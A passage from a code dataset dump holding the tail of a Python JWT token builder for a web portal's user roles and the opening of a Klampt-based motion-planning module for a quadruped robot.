TInstance.TIns_ApplicationPath,\n TInstance.TIns_Theme,\n TInstance.TIns_Database,\n TInstance.TIns_Order,\n TInstance.TIns_ReadOnly,\n TApplications.TApp_ClientID,\n TApplications.TApp_Description,\n TRoles.TRol_Label,\n TUsers.TUse_PK_ID,\n TUsers.TUse_Login,\n TUsers.TUse_Language,\n TSite.TSit_Name,\n TSite.TSit_Project,\n TSite.TSit_ImagePathMainLogo,\n TSite.TSit_ImagePathMainMenu,\n TAutorisations.TUse_Observer\n ]\n\n VAllUsersApplications = request.dbsession.query(TInstance)\n VAllUsersApplications = VAllUsersApplications.join(TApplications)\n VAllUsersApplications = VAllUsersApplications.join(\n TAutorisations,\n TInstance.TIns_PK_ID == TAutorisations.TAut_FK_TInsID\n )\n VAllUsersApplications = VAllUsersApplications.join(TRoles)\n VAllUsersApplications = VAllUsersApplications.join(TUsers)\n VAllUsersApplications = VAllUsersApplications.join(\n TSite,\n TInstance.TIns_FK_TSitID == TSite.TSit_PK_ID\n )\n\n VAllUsersApplications = VAllUsersApplications.with_entities(*colsToRet)\n\n VAllUsersApplications = VAllUsersApplications.filter(\n (TSite.TSit_Name == tsiteName),\n (TUsers.TUse_PK_ID == idUser),\n (TRoles.TRol_Label != 'Interdit')\n )\n VAllUsersApplications = VAllUsersApplications.order_by(\n TInstance.TIns_Order\n )\n\n result = VAllUsersApplications.all()\n\n now = datetime.datetime.now()\n nowInTimeStampSeconds = int(now.timestamp())\n\n payload = {\n \"iss\": str(result[0].TUse_PK_ID), # TODO replace by 'NSPortal', after all app compatible with auth proces\n \"sub\": str(result[0].TUse_PK_ID),\n \"username\": result[0].TUse_Login,\n \"userlanguage\": result[0].TUse_Language,\n 'exp': nowInTimeStampSeconds + timeAddForExp,\n \"roles\": {\n row.TIns_Label: row.TRol_Label for row in result\n }\n }\n\n return payload\n\n\ndef getAccessToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='accessTokenSecret',\n algoKey='accessTokenAlgorithm'\n )\n\n payload = buildPayload(\n idUser=idUser,\n request=request,\n timeAddForExp=_accessTokenExpInSec\n )\n\n return myEncode(payload, secret, algorithm=algorithm)\n\n\ndef getRefreshToken(idUser, request):\n secret, algorithm = getSecretAndAlgorithFromPolicy(\n request=request,\n tokenKey='refreshTokenSecret',\n algoKey='refreshTokenAlgorithm'\n )\n\n now = datetime.datetime.now()\n nowInTimeStampSeconds = int(now.timestamp())\n\n payload = {\n 'sub': str(idUser),\n 'exp': nowInTimeStampSeconds + _refreshTokenExpInSec\n }\n\n return myEncode(payload, secret, algorithm=algorithm)\n","sub_path":"Back/ns_portal/utils/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"165607086","text":"import time\nfrom scipy import optimize\nfrom klampt import vis\nfrom shapely.geometry import LineString\nimport numpy as np\nfrom klampt.math import so3\nfrom klampt.model.collide import WorldCollider\nfrom src.utils.logger import Logger\nfrom src.utils.geometry_objects._2d_circle_geometry import LegRange\nfrom src.utils.geometry_objects._2d_triangle_geometry import SupportTriangle\nfrom shapely.geometry import Point\nfrom src.utils.math_utils import MathUtils\nfrom src.utils.vis_utils import VisUtils\nfrom src.utils.data_objects.height_map import HeightMap\nfrom src.utils import project_constants\n\nclass RobotPose:\n\n def __init__(self, fl, fr, br, bl, torso_xyz_yawdeg):\n self.fl, self.fr, self.br, self.bl, self.torso_xyz_yawdeg = fl, fr, br, bl, torso_xyz_yawdeg\n\n def 
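
# Note on the token.py record above: in PyJWT's exception hierarchy,
# InvalidSignatureError derives from DecodeError, which derives from
# InvalidTokenError, so catching InvalidTokenError first makes the two later
# handlers unreachable; verify=False also disables signature checking outright
# (PyJWT 2.x removed that kwarg in favour of
# options={"verify_signature": False}). A hedged reordering with verification
# left on:
import jwt

def my_decode(token, secret):
    try:
        return jwt.decode(token, secret, algorithms=["HS256", "HS512"])
    except jwt.ExpiredSignatureError:
        raise jwt.ExpiredSignatureError(
            "You took too long to use your token; log in again")
    except jwt.InvalidSignatureError:
        raise jwt.InvalidSignatureError(
            "The token signature does not match the payload")
    except jwt.DecodeError:
        raise jwt.DecodeError("The token could not be decoded")
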
update_end_effectors(self,fl, fr, br, bl):\n self.fl, self.fr, self.br, self.bl = fl, fr, br, bl\n\n def get_moving_leg_xyzR(self,moving_leg):\n if moving_leg == 1: return self.fl\n if moving_leg == 2: return self.fr\n if moving_leg == 3: return self.br\n if moving_leg == 4: return self.bl\n\n def update_moving_legs_xyz(self, moving_leg, xyz):\n if moving_leg == 1: self.fl = xyz\n if moving_leg == 2: self.fr = xyz\n if moving_leg == 3: self.br = xyz\n if moving_leg == 4: self.bl = xyz\n\n def update_torso_xyz_yaw_deg(self,torso_xyz_yawdeg):\n self.torso_xyz_yawdeg = torso_xyz_yawdeg\n\n def debug(self):\n print(\"\\nRobotPose debug\")\n VisUtils.visualize_cost(self.fl[0],self.fl[1],.25,\"front left\")\n VisUtils.visualize_cost(self.fr[0],self.fr[1],.25,\"front right\")\n VisUtils.visualize_cost(self.br[0],self.br[1],.25,\"back right\")\n VisUtils.visualize_cost(self.bl[0],self.bl[1],.25,\"back left\")\n VisUtils.visualize_cost(self.torso_xyz_yawdeg[0], self.torso_xyz_yawdeg[1], .25, \"torso\",with_z=self.torso_xyz_yawdeg[2])\n print(\" Front Left:\",Logger.pp_list(self.fl), \"len:\",len(self.fl))\n print(\" Front Right:\",Logger.pp_list(self.fr), \"len:\",len(self.fr))\n print(\" Back Right:\",Logger.pp_list(self.br), \"len:\",len(self.br))\n print(\" Back Left:\",Logger.pp_list(self.bl), \"len:\",len(self.bl))\n print(\" Torso:\",Logger.pp_list(self.torso_xyz_yawdeg),\"\\n\")\n\n\nclass Constraints:\n\n def __init__(self, support_triangles, range_circles):\n self.support_triangles = support_triangles\n self.range_circles = range_circles\n\n def get_xy_centroid(self):\n if len(self.support_triangles) >= 1:\n if len(self.support_triangles) >=2:\n o_support_tris = self.support_triangles[1:]\n o_3d_objs = o_support_tris + self.range_circles\n return self.support_triangles[0].xy_centroid_from_o_3dgeoms(o_3d_objs)\n else:\n return self.support_triangles[0].xy_centroid_from_o_3dgeoms(self.range_circles)\n\n def xy_in_support_area(self, x, y, ignore_range_tris=False):\n if ignore_range_tris:\n if len(self.support_triangles) == 1:\n return self.support_triangles[0].point_is_inside([x, y])\n else:\n Logger.log(\"Multiple support triangle point inside detection unimplemented, exiting\", \"FAIL\")\n return \"this should throw an error\"\n support_objs = self.get_all_objects()\n return support_objs[0].point_is_inside_o_3d_geoms([x,y,.25], support_objs)\n\n def number_constraints(self):\n return len(self.support_triangles) + len(self.range_circles)\n\n def debug(self):\n print(\"\\n\",len(self.support_triangles),\"support triangles,\",len(self.range_circles),\"range circles\")\n for i in range(len(self.support_triangles)):\n print(\" support tri\",i,\":\")\n for i in range(len(self.range_circles)):\n print(\" range_circles\", i,\" has centroid at:\",Logger.pp_list([self.range_circles[i].x,self.range_circles[i].y]))\n\n def get_all_objects(self):\n ret = []\n for tri in self.support_triangles:\n ret.append(tri)\n for rcircle in self.range_circles:\n ret.append(rcircle)\n return ret\n\n def get_support_triangles(self):\n return self.support_triangles\n\n def get_range_circles(self):\n return self.range_circles\n\n def visualize_support_tri(self):\n for support_tri in self.support_triangles:\n support_tri.visualize()\n\n def remove_support_tri_visualization(self):\n for support_tri in self.support_triangles:\n support_tri.remove_visualization()\n\n def visualize_range_circles(self):\n for circle in self.range_circles:\n circle.visualize()\n\n def remove_range_circle_visualizations(self):\n for circle in 
self.range_circles:\n circle.remove_visualization()\n\n def visualize_all(self, hm=None):\n self.visualize_range_circles()\n self.visualize_support_tri()\n\n def remove_all_visualizations(self):\n self.remove_range_circle_visualizations()\n self.remove_support_tri_visualization()\n\n\nclass MotionUtils:\n\n def __init__( self, world, height_map: HeightMap, scatter_list, state_path, gradient_map, u_input=None,\n include_ik_solver=False, lidar_mode=False):\n \n self.u_input = u_input\n self.gradient_map = gradient_map\n self.scatter_list = scatter_list\n self.stance_path = state_path\n self.world = world\n self.robosimian = world.robot(0)\n self.bl_end_effector = self.robosimian.link(project_constants.BL_ACTIVE_DOFS[len(project_constants.BL_ACTIVE_DOFS) - 1])\n self.br_end_effector = self.robosimian.link(project_constants.BR_ACTIVE_DOFS[len(project_constants.BR_ACTIVE_DOFS) - 1])\n self.fl_end_effector = self.robosimian.link(project_constants.FL_ACTIVE_DOFS[len(project_constants.FL_ACTIVE_DOFS) - 1])\n self.fr_end_effector = self.robosimian.link(project_constants.FR_ACTIVE_DOFS[len(project_constants.FR_ACTIVE_DOFS) - 1])\n self.torso = self.robosimian.link(project_constants.TORSO_LINK_INDEX)\n self.height_map = height_map\n if include_ik_solver:\n from .ik_solver_utils import IKSolverUtils\n self.collider = WorldCollider(self.world)\n self.IKSolverUtil = IKSolverUtils(world, height_map, self.scatter_list, self.stance_path, gradient_map)\n\n def countdown(self,t):\n for i in range(t):\n i = t-i\n for j in range(i):\n print(\".\", end=' ')\n print()\n time.sleep(1)\n\n def debug_visualize_stance(self, stance_idx, constraint_obj: Constraints, visualize=False, debug=False):\n\n stance_state = self.stance_path[stance_idx]\n try:\n stance_state_next = self.stance_path[stance_idx + 1]\n\n except IndexError:\n # Logger.log(\"error inbound\",\"FAIL\")\n stance_state_next = None\n\n fl_xyz, fr_xyz, br_xyz, bl_xyz = self.get_end_affector_xyzs_from_curr_stance(stance_state)\n try:\n fl_xyz_next, fr_xyz_next, br_xyz_next, bl_xyz_next = self.get_end_affector_xyzs_from_curr_stance(stance_state_next)\n except TypeError:\n return\n\n moving_leg = self.get_moving_leg_from_stance_idx(stance_idx)\n\n if debug:\n print(f\"stance idx:{stance_idx}/{len(self.stance_path)} stance_state:\", self.stance_path[stance_idx], f\"\\t\\ttorso xy: {Logger.pp_list(self.robosimian.getConfig()[0:3])}\")\n print()\n\n # msg = \"Step distance for fl end effector: \" + Logger.pp_double(\n # MathUtils._3d_euclidian_distance(self.fl_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n # msg = \"Step distance for fr end effector: \" + Logger.pp_double(MathUtils._3d_euclidian_distance(\n # self.fr_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n # msg = \"Step distance for br end effector: \" + Logger.pp_double(\n # MathUtils._3d_euclidian_distance(self.br_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n # msg = \"Step distance for bl end effector: \" + Logger.pp_double(MathUtils._3d_euclidian_distance(\n # self.bl_end_effector.getWorldPosition([0, 0, 0]), xyzR_next[0:3]))\n\n # debugging\n diag_dist_2d = -1\n diag_dist_3d = -1\n # tri = #[fl_xyz, fr_xyz, br_xyz, bl_xyz]\n tri = constraint_obj.get_support_triangles()[0]\n if moving_leg == 1:\n diag_dist_2d = MathUtils._2d_euclidian_distance(fl_xyz, br_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(fl_xyz, br_xyz)\n # tri.remove(fl_xyz)\n elif moving_leg == 2:\n # tri.remove(fr_xyz)\n diag_dist_2d = MathUtils._2d_euclidian_distance(fr_xyz, 
bl_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(fr_xyz, bl_xyz)\n elif moving_leg == 3:\n # tri.remove(br_xyz)\n diag_dist_2d = MathUtils._2d_euclidian_distance(br_xyz, fl_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(br_xyz, fl_xyz)\n elif moving_leg == 4:\n # tri.remove(bl_xyz)\n diag_dist_2d = MathUtils._2d_euclidian_distance(bl_xyz, fr_xyz)\n diag_dist_3d = MathUtils._3d_euclidian_distance(bl_xyz, fr_xyz)\n\n # inscribed_circX, inscribed_circY, inscribed_circR = MathUtils.incenter_circle_xy_R_fromT(tri)\n inscribed_circX, inscribed_circY, inscribed_circR = tri.incenterx, tri.incentery, tri.incenterr\n inscribed_circZ = self.height_map.height_at_xy(inscribed_circX, inscribed_circY)\n\n moving_leg_to_com_dist_curr_2d = -1\n moving_leg_to_com_dist_next_2d = -1\n moving_leg_to_com_dist_curr_3d = -1\n moving_leg_to_com_dist_next_3d = -1\n\n com_diag_line = tri.get_diag_linestring()\n\n if moving_leg == 1:\n\n # com_diag_line = LineString([bl_xyz[0:2], fr_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([fl_xyz[0:2], [inscribed_circX, inscribed_circY]])\n\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(fl_xyz, [intersection_pt.x, intersection_pt.y])\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(fl_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([fl_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(fl_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(fl_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(fl_xyz, [intersection_pt.x, intersection_pt.y], name=\"daig_com_dist\")\n VisUtils.visualize_line(fl_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(fl_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n elif moving_leg == 2:\n # com_diag_line = LineString([fl_xyz[0:2], br_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([fr_xyz[0:2], [inscribed_circX, inscribed_circY]])\n\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_ptxy = [intersection_pt.x, intersection_pt.y]\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(fr_xyz, intersection_ptxy)\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(fr_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([fr_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(fr_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n 
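            # Distance from the stepping foot (current and next hold) to where
            # its ray toward the incenter crosses the support diagonal; the 2D
            # and 3D variants feed the stability debug printout below.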
moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(fr_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(fr_xyz, intersection_ptxy, name=\"daig_com_dist\")\n VisUtils.visualize_line(fr_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(fr_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n elif moving_leg == 3:\n\n # com_diag_line = LineString([bl_xyz[0:2], fr_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([br_xyz[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(br_xyz, [intersection_pt.x, intersection_pt.y])\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(br_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([br_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(br_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(br_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(br_xyz, [intersection_pt.x, intersection_pt.y], name=\"daig_com_dist\")\n VisUtils.visualize_line(br_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(br_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n elif moving_leg == 4:\n # com_diag_line = LineString([fl_xyz[0:2], br_xyz[0:2]])\n moving_leg_to_incenter_line = LineString([bl_xyz[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt = com_diag_line.intersection(moving_leg_to_incenter_line)\n intersection_pt_xyz = [intersection_pt.x, intersection_pt.y, self.height_map.height_at_xy(intersection_pt.x, intersection_pt.y)]\n\n moving_leg_to_com_dist_curr_2d = MathUtils._2d_euclidian_distance(bl_xyz, [intersection_pt.x, intersection_pt.y])\n moving_leg_to_com_dist_curr_3d = MathUtils._3d_euclidian_distance(bl_xyz, intersection_pt_xyz)\n\n moving_leg_to_incenter_line_next = LineString([bl_xyz_next[0:2], [inscribed_circX, inscribed_circY]])\n intersection_pt_next = com_diag_line.intersection(moving_leg_to_incenter_line_next)\n intersection_pt_next_xyz = [intersection_pt_next.x, intersection_pt_next.y,\n self.height_map.height_at_xy(intersection_pt_next.x, intersection_pt_next.y)]\n\n moving_leg_to_com_dist_next_2d = MathUtils._2d_euclidian_distance(br_xyz_next, [intersection_pt_next.x, intersection_pt_next.y])\n moving_leg_to_com_dist_next_3d = MathUtils._3d_euclidian_distance(br_xyz_next, intersection_pt_next_xyz)\n\n if visualize:\n VisUtils.visualize_line(bl_xyz, [intersection_pt.x, intersection_pt.y], name=\"daig_com_dist\")\n VisUtils.visualize_line(bl_xyz_next, [intersection_pt_next.x, intersection_pt_next.y], name=\"daig_com_dist_next\")\n VisUtils.visualize_line(bl_xyz_next, intersection_pt_next_xyz, name=\"D1_3d\")\n\n if visualize:\n vis.setColor(\"daig_com_dist\", 1, 0, 0, a=1.0)\n VisUtils.visualize_circle(inscribed_circX, inscribed_circY, 
inscribed_circR, \"inscribed_circle\", hm=self.height_map)\n vis.setColor(\"D1_3d\", 1, 0, 1, a=1.0)\n\n if debug:\n print(\n f\"moving leg: {moving_leg} \\tincenter r: {round(inscribed_circR, 3)}\"\n # f\" 2d_diag dist: {round(diag_dist_2d, 3)} \\n\"\n f\" 3d_diag dist: {round(diag_dist_3d, 3)} \\n\"\n # f\" moving_leg_to_com_dist_curr_2d: {round(moving_leg_to_com_dist_curr_2d, 3)}\\n\"\n f\" moving_leg_to_com_dist_curr_3d: {round(moving_leg_to_com_dist_curr_3d, 3)}\\n\"\n # f\" moving_leg_to_com_dist_next_2d: {round(moving_leg_to_com_dist_next_2d, 3)}\\n\"\n f\" moving_leg_to_com_dist_next_3d: {round(moving_leg_to_com_dist_next_3d, 3)}\")\n #\n # if moving_leg_to_com_dist_curr_3d > moving_leg_to_com_dist_curr_2d:\n # print(f\"moving_leg_to_com_dist_curr_3d > moving_leg_to_com_dist_curr_2d: {round(moving_leg_to_com_dist_curr_3d,4)} > {round(moving_leg_to_com_dist_curr_2d,4)}\")\n #\n # if moving_leg_to_com_dist_next_3d > moving_leg_to_com_dist_next_2d:\n # print(f\"moving_leg_to_com_dist_next_3d > moving_leg_to_com_dist_next_2d: {round(moving_leg_to_com_dist_next_3d,4)} > {round(moving_leg_to_com_dist_next_2d,4)}\")\n\n def skip_to_stance(self, stance_idx):\n self.j = 1\n self.i = 1\n self.torso_inside_new_support_tri = False\n self.curr_stance_idx = stance_idx\n self.curr_stance = self.stance_path[self.curr_stance_idx]\n self.robot_pose = self.get_robot_pose_from_stance(self.curr_stance, with_end_effector_Rs=True)\n self.IKSolverUtil.set_pose_w_R(self.robot_pose)\n\n def manual_torso_control(self):\n c = .0025\n while not self.u_input.exit():\n self.test_for_collisions(self.collider)\n dx, dy = self.u_input.get_direction(c)\n self.update_torso_com_line()\n torso_xyz_yaw_deg = self.robot_pose.torso_xyz_yawdeg\n torso_xyz_yaw_deg[0] += dx\n torso_xyz_yaw_deg[1] += dy\n self.robot_pose.update_torso_xyz_yaw_deg(torso_xyz_yaw_deg)\n self.IKSolverUtil.set_pose_w_R(self.robot_pose)\n time.sleep(.01)\n return\n\n def test_for_collisions(self,collider):\n for i, j in collider.collisionTests():\n if i[1].collides(j[1]):\n print(\"Object\", i[0].getName(), \"collides with\", j[0].getName())\n\n def get_end_effector_from_end_effector_number(self, end_effector):\n if end_effector == 4:\n return self.bl_end_effector\n elif end_effector == 3:\n return self.br_end_effector\n elif end_effector == 1:\n return self.fl_end_effector\n elif end_effector == 2:\n return self.fr_end_effector\n else:\n msg = \"Error finding: \"+str(end_effector)\n Logger.log(msg, \"FAIL\")\n return False\n\n def get_end_effector_current_xyzs(self):\n fl_xyz = self.fl_end_effector.getWorldPosition([0, 0, 0])\n fr_xyz = self.fr_end_effector.getWorldPosition([0, 0, 0])\n br_xyz = self.br_end_effector.getWorldPosition([0, 0, 0])\n bl_xyz = self.bl_end_effector.getWorldPosition([0, 0, 0])\n return fl_xyz, fr_xyz, br_xyz, bl_xyz\n\n def get_end_effector_current_xyzRs(self):\n fl_xyz, fr_xyz, br_xyz, bl_xyz = self.get_end_effector_current_xyzs()\n fl_R = self.fl_end_effector.getTransform()[0]\n fr_R = self.fr_end_effector.getTransform()[0]\n br_R = self.br_end_effector.getTransform()[0]\n bl_R = self.bl_end_effector.getTransform()[0]\n fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR = fl_xyz+[fl_R], fr_xyz+[fr_R], br_xyz+[br_R], bl_xyz+[bl_R]\n return fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR\n\n def estimate_torso_xy_yaw_rads_from_stance(self, stance):\n\n if self.scatter_list == None:\n Logger.log(\"Error: self.scatter_list has not been initialized\", \"FAIL\")\n\n fl_xyzc, fr_xyzc, br_xyzc, bl_xyzc = self.get_end_affector_xyzs_from_curr_stance(stance)\n 
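        # Torso xy is estimated as the centroid of the four footholds; yaw is
        # taken from the average of the normalised left- and right-side
        # vectors via arctan2, so a skewed stance still yields a heading.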
x_ave = (fl_xyzc[0] + fr_xyzc[0] + bl_xyzc[0] + br_xyzc[0]) / 4.0\n y_ave = (fl_xyzc[1] + fr_xyzc[1] + bl_xyzc[1] + br_xyzc[1]) / 4.0\n right_side_v = np.array([fr_xyzc[0] - br_xyzc[0], fr_xyzc[1] - br_xyzc[1]])\n left_side_v = np.array([fl_xyzc[0] - bl_xyzc[0], fl_xyzc[1] - bl_xyzc[1]])\n right_side_normalized_v = right_side_v / np.linalg.norm(right_side_v)\n left_side_normalized_v = left_side_v / np.linalg.norm(left_side_v)\n ave_v = left_side_normalized_v + right_side_normalized_v\n yaw_rads = np.arctan2(ave_v[1], ave_v[0])\n return x_ave, y_ave, yaw_rads\n\n def get_torso_xy_yawdeg_from_stance(self, stance):\n x_ave, y_ave, yaw_rads = self.estimate_torso_xy_yaw_rads_from_stance(stance)\n return [x_ave, y_ave, np.rad2deg(yaw_rads)]\n\n def get_end_affector_xyzs_from_curr_stance(self, stance):\n\n if self.scatter_list == None:\n Logger.log(\"Error: self.scatter_list has not been initialized\", \"FAIL\")\n fl_xyz = self.scatter_list[int(stance[0])][0:3]\n fr_xyz = self.scatter_list[int(stance[1])][0:3]\n br_xyz = self.scatter_list[int(stance[2])][0:3]\n bl_xyz = self.scatter_list[int(stance[3])][0:3]\n return fl_xyz, fr_xyz, br_xyz, bl_xyz\n\n def get_active_dofs_from_end_effector(self, end_effector):\n if end_effector == 1:\n return project_constants.FL_ACTIVE_DOFS\n elif end_effector == 2:\n return project_constants.FR_ACTIVE_DOFS\n elif end_effector == 3:\n return project_constants.BR_ACTIVE_DOFS\n elif end_effector == 4:\n return project_constants.BL_ACTIVE_DOFS\n else:\n msg = \"Error finding: \"+str(end_effector)\n Logger.log(msg, \"FAIL\")\n return False\n\n def get_shoulder_from_end_effector(self, end_effector):\n if not end_effector in [1, 2, 3, 4]:\n print_str = \"Error: \"+str(end_effector)+\" unrecognized\"\n Logger.log(print_str, \"FAIL\")\n return\n if end_effector == 4:\n end_effector = self.robosimian.link(project_constants.BL_ACTIVE_DOFS[0])\n elif end_effector == 3:\n end_effector = self.robosimian.link(project_constants.BR_ACTIVE_DOFS[0])\n elif end_effector == 1:\n end_effector = self.robosimian.link(project_constants.FL_ACTIVE_DOFS[0])\n else:\n end_effector = self.robosimian.link(project_constants.FR_ACTIVE_DOFS[0])\n return end_effector\n\n def update_torso_com_line(self):\n torso_xyz = self.robosimian.getConfig()[0:3]\n ground_xyz = [torso_xyz[0], torso_xyz[1], self.height_map.height_at_xy(torso_xyz[0],torso_xyz[1])]\n VisUtils.visualize_line(torso_xyz, ground_xyz, \"torso com\")\n\n def print_robot_config(self):\n print(Logger.pp_list(self.robosimian.getConfig()))\n\n def get_constraint_obj(self, stance_idx, moving_leg=None, visualize=True):\n current_support_tri = self.get_support_triangle_from_stance_idx(stance_idx)\n if moving_leg:\n range_circles = self.get_end_effector_range_circles(stance_idx, visualize=False)\n else:\n range_circles = self.get_end_effector_range_circles(stance_idx, only_include_current_holds=True, visualize=False)\n constraint_obj = Constraints([current_support_tri], range_circles)\n if visualize:\n constraint_obj.visualize_all()\n\n return constraint_obj\n\n def get_moving_leg_xyz_0(self, moving_leg, stance_idx):\n return self.adjust_endeff_z(self.scatter_list[self.stance_path[stance_idx][moving_leg - 1]])\n\n def get_moving_leg_xyz_f(self, moving_leg, stance_idx):\n return self.adjust_endeff_z(self.scatter_list[self.stance_path[stance_idx + 1][moving_leg - 1]])\n\n def get_robot_pose_from_current_stance(self,with_end_eff_R=False):\n current_torso_xyz_yaw = self.get_current_torso_xyz_yaw_deg()\n fl, fr, br, bl = 
self.get_end_effector_current_xyzs()\n if with_end_eff_R:\n fl += [self.fl_end_effector.getTransform()[0]]\n fr += [self.br_end_effector.getTransform()[0]]\n br += [self.br_end_effector.getTransform()[0]]\n bl += [self.fl_end_effector.getTransform()[0]]\n r_pose = RobotPose(fl, fr, br, bl, current_torso_xyz_yaw)\n return r_pose\n\n def update_rpose_from_current_stance(self, rpose):\n fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR = self.get_end_effector_current_xyzRs()\n torso_xyz_yawdeg = self.get_current_torso_xyz_yaw_deg()\n rpose.update_end_effectors(fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR)\n rpose.update_torso_xyz_yaw_deg(torso_xyz_yawdeg)\n\n def get_robot_pose_from_stance(self, stance, with_end_effector_Rs=False, debug=False, visualize_normal=True):\n fl, fr, br, bl = self.get_end_affector_xyzs_from_curr_stance(stance)\n fl, fr, br, bl = self.adjust_all_end_effector_zs(fl, fr, br, bl)\n estimated_torso_xy_yaw = self.estimate_torso_xy_yaw_rads_from_stance(stance)\n torso_z = self.get_torso_z_des_from_xy(estimated_torso_xy_yaw, stance, debug=debug)\n estimated_torso_xyz_yaw = [estimated_torso_xy_yaw[0], estimated_torso_xy_yaw[1], torso_z, np.rad2deg(estimated_torso_xy_yaw[2]) ]\n if with_end_effector_Rs:\n fl_xyzR = fl + [self.get_end_effector_rotation_matrix( 1, xyz=fl, visualize_normal=visualize_normal, debug=debug)]\n fr_xyzR = fr + [self.get_end_effector_rotation_matrix( 2, xyz=fr, visualize_normal=visualize_normal, debug=debug)]\n br_xyzR = br + [self.get_end_effector_rotation_matrix( 3, xyz=br, visualize_normal=visualize_normal, debug=debug)]\n bl_xyzR = bl + [self.get_end_effector_rotation_matrix( 4, xyz=bl, visualize_normal=visualize_normal, debug=debug)]\n r_pose = RobotPose(fl_xyzR, fr_xyzR, br_xyzR, bl_xyzR, estimated_torso_xyz_yaw)\n else:\n r_pose = RobotPose(fl, fr, br, bl, estimated_torso_xyz_yaw)\n return r_pose\n\n def adjust_all_end_effector_zs(self,fl, fr, br, bl):\n return self.adjust_endeff_z(fl), self.adjust_endeff_z(fr),self.adjust_endeff_z(br),self.adjust_endeff_z(bl)\n\n def get_moving_leg_xyzR_f(self, moving_leg: int, stance_idx: int, visualize_normal=False):\n return self.get_moving_leg_xyzR_0(moving_leg, stance_idx + 1, visualize_normal=visualize_normal)\n\n def get_moving_leg_xyzR_0(self, moving_leg: int, stance_idx: int, visualize_normal=False):\n ''' Assumes class has a gradient map'''\n xyz = self.get_moving_leg_xyz_0(moving_leg, stance_idx)\n R = self.get_end_effector_rotation_matrix(moving_leg, xyz=xyz, visualize_normal=visualize_normal)\n return xyz + [R]\n\n def get_end_effector_rotation_matrix(self, end_effector, xyz=None, yaw_rad=None, visualize_normal=False, debug=False):\n upright = [0, 0, -1, 0, 1, 0, 1, 0, 0]\n if end_effector in [1, 4]:\n upright = [0, 0, -1, 0, -1, 0, -1, 0, 0]\n if xyz:\n xyz[2] -= project_constants.END_EFFECTOR_HEIGHT\n x_grad, y_grad = self.gradient_map.get_grad_at_world_xy(xyz[0], xyz[1])\n x_grad /= 2 * project_constants.HM_X_GRANULARITY; y_grad /= 